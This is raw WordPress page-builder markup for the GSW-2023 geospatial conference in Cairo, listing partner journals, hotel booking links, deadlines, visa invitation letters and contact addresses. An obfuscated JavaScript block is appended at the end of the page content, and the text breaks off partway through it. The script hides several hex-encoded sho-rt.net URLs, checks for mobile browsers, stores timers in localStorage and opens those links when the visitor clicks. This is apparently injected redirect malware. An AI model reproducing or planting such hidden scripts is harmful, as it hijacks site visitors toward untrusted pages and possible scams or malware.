css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n<h3></h3>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\r\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\r\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][vc_column_text][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\r\n<ul>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_column_text][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n<p>[/ultimate_heading][/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const 